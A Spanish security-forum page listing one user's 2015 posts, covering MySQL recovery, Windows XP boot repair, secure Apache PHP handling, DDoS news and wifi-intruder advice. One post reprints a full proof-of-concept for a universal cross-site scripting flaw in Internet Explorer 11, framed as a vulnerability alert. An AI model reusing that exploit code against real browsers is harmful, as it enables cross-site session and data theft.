Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

#1521
danmaster, es una tabla MyIsam me imagno ¿?

CitarAl final hemos restaurado un backup. Pero aún así a tardado 3 dias y con un disco duro SSD por que con uno SATA sigue con ello después de 5 dias.

Ya sabes, usa un disco SSD para agilizar el proceso.

Y la próxima vez usa en el my.cnf:

# Auto-creates a backup when running the recover operation.
# http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_myisam-recover
# myisam-recover           = BACKUP
myisam-recover-options = BACKUP,FORCE
#1522
Hardware / Re: Sistema operativo.
4 Febrero 2015, 19:26 PM
¿Es un Windows XP no? Por el error " Error al cargar el sistema operativo" debe serlo xD

Revisar el disco duro (usa alguna utilidad para verificar su estado).

Para que Windows arranque puedas usar un CD de Windows XP y usar la consola de recuperación, con los comandos fixmbr, etc.

Prueba de usar la consola de recuperación del Windows XP a ver si arreglas algo.


FIXMBR
FIXBOOT
BOOTCFG /Rebuild  /fastdete


Como usar la consola de recuperación en Windows XP
http://foro.elhacker.net/windows/como_usar_la_consola_de_recuperacion_en_windows_xp-t33550.0.html

Consola de Recuperación del Windows XP
http://www.elhacker.net/consola_recuperacion_xp.htm

Si la consola falla o no consigues nada, aún usando los típicos comandos FIXMBR
FIXBOOT, BOOTCFG /Rebuild, metes el cd de Windows le dices que lo quieres instalar, te dirá que ya hay un sistema operativo instalado y le indicas reparar, como bien comentas. No pierdes documentos, ni programas instalados, ni escritorio, sólo los services packs y parches del sistema.
#1523
Dudas Generales / Re: WordPress hash MD5
4 Febrero 2015, 19:00 PM
Extract Wordpress-MD5

# egrep -o '\$P\$\S{31}' $P$B6Fzblw/uq3gIS6hQ.ymn1qxCmmbHn/ > wordpress-md5.txt
#1524
1) Bypassing Image Uploaders o Local JPG shell Inclusion (LFI using php injected JPG)
2) No sólo hay que comprobar la extensión, también las cabeceras.
3) Programador y Configuración Apache.

SetHandler vs AddHandler

El problema es que hay en internet miles de sitios que recomienda esta configuración vulnerable con AddHandler o AddType:

AddHandler php5-script .php

La opción recomendada y más segura para "ejecutar" los ficheros php en Apache es con FilesMatch:

<FilesMatch \.php$>
   SetHandler application/x-httpd-php
</FilesMatch>



Apache httpd.conf

# inseguro .php.txt
#AddType application/x-httpd-php .php

# seguro
<FilesMatch \.php$>
   SetHandler application/x-httpd-php
</FilesMatch>


PHP and Apache Security, SetHandler vs AddHandler
http://blog.famillecollet.com/post/2013/01/13/PHP-and-Apache-SetHandler-vs-AddHandler

shell archivo.php.jpg se ejecuta sin problemas
http://foro.elhacker.net/nivel_web/shell_archivophpjpg_se_ejecuta_sin_problemas-t410407.0.html

PHP upload security
http://foro.elhacker.net/nivel_web/php_upload_security-t277601.0.html

Local JPG shell Inclusion
http://foro.elhacker.net/hacking_avanzado/local_jpg_shell_inclusion-t158322.0.html
#1525
Todo son malas noticias:

Informe de la OMS que vincula el humo diesel y diferentes enfermedades muy graves
Informe detallado de la OMS en el que a lo largo de diversos años diferentes estudios vinculan el humo diesel con los infartos, ictus, cáncer de pulmón, vejiga y mama, daños neuronales y en la gestación durante el embarazo y muchas más alteraciones que produce este contaminante.

http://www.goiena.org/bidegorris/argumentario-contaminacion-vehiculos.pdf
#1526
Bugs y Exploits / XSS en Internet Explorer 11
4 Febrero 2015, 11:08 AM
La última versión estable de Internet Explorer, la 11.0.15, puede permitir a un atacante inyectar código y robar los datos de otras páginas que el usuario tiene abiertas en otras pestañas o ventanas. Se trata de un Cross Site Scripting universal o UXSS que evade totalmente la Política del Mismo Origen o Same Origin Policy (SOP), es decir, da igual que una web tenga o no vulnerabilidades XSS, sólo por usar la última versión del navegador de Microsoft el usuario está expuesto a que le roben los datos de su sesión en cualquier otro dominio, incluso HTTP a HTTPS.

Existe una PoC en la que se demuestra como es posible inyectar código en el Daily Mail a través de otro dominio distinto:

http://www.deusen.co.uk/items/insider3show.3362009741042107/

<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br>
<iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br>
<script>
function go()
{
  w=window.frames[0];
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);
</script>


Por el momento Microsoft no ha publicado un parche para solucionar esta vulnerabilidad. Estamos probando distintas mitigaciones y analizando el bug (en versiones anteriores la PoC no funciona) pero por el momento aconsejamos usar otros navegadores.

Fuente:
http://www.hackplayers.com/2015/02/xss-universal-en-ie11.html
#1527
Cita de: Eleкtro en  4 Febrero 2015, 01:04 AM
¿el mismo límite ha sido impuesto en el resto de secciones aparte del subforo de Noticias?

Era para todos los foros si, aunque lo acabo de quitar, así que...
#1528
joder, éste esta peor de la cabeza que el que ataca el foro  :-X

En China hay varios centros de desintoxicación de Internet. Es uno de los países con mayor número de adictos.

CitarSegún el encargado de uno de estos centros en Shanghái, hay adolescentes que juegan videojuegos con pañales para así no ir al baño.

[youtube=640,360]http://www.youtube.com/watch?v=jqctG3NnDa0[/youtube]
#1529
 DDoS-for-hire services aka booters o stressers

Ataques UDP Reflection Flood DrDoS (Inundación mediante Amplificación)
http://blog.elhacker.net/2014/06/udp-flood-inundacion-reflection-attack-ataque.html

Atención a los ataques SSDP (Simple Service Discovery Protocol) Puerto 1900 udp SSDP Plug & Play (UPnP), un 38% del total de dispositivos son vulnerables... ahí es nada.
#1530
Sobre el tema legal se ha tratado mucho:

Mi vecino me roba el wifi
http://foro.elhacker.net/hacking_wireless/mi_vecino_me_roba_el_wifi-t421602.0.html

Y el tema en si mucho más.

Mi vecino me roba y no se que hacer
http://foro.elhacker.net/hacking_wireless/mi_vecino_me_roba_y_no_se_que_hacer-t382570.30.html

Cómo saber quién se conecta a tu red WiFi
http://blog.elhacker.net/2013/03/saber-descubrir-quien-se-conecta-accede-tu-mi-red-wifi.html

como dar un escarmiento a quien me roba wifi???
http://foro.elhacker.net/hacking_basico/como_dar_un_escarmiento_a_quien_me_roba_wifi-t338133.0.html

Podrías analizar el tráfico con Wireshark:

Manual análisis tráfico de red con Wireshark
http://blog.elhacker.net/2015/01/manual-analisis-de-trafico-con-wireshark.html

Pero lógicamente para analizar el tráfico https tendrás que usar un MITM.

Ejemplo:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

Otra opción usar "Cazador Cazado" de Wifislax o parecido, pero vaya, es una toneria enseñar un mensaje a la persona que roba wifi...

http://www.wifidel.com/asusta-a-los-intrusos-en-tu-red-wifi-el-cazador-cazado/

Lo mejor sería gastar algún tipo de broma tipo la mejor que he  visto hasta al momento y es darle la vuelta (espejo) a las páginas web de la persona que navega:

Combatiendo a los ladrones de Wi-fi
http://foro.elhacker.net/noticias/combatiendo_a_los_ladrones_de_wifi-t159236.0.html

Bueno técnicamente es darle la vuelta (girar) todas las imágenes.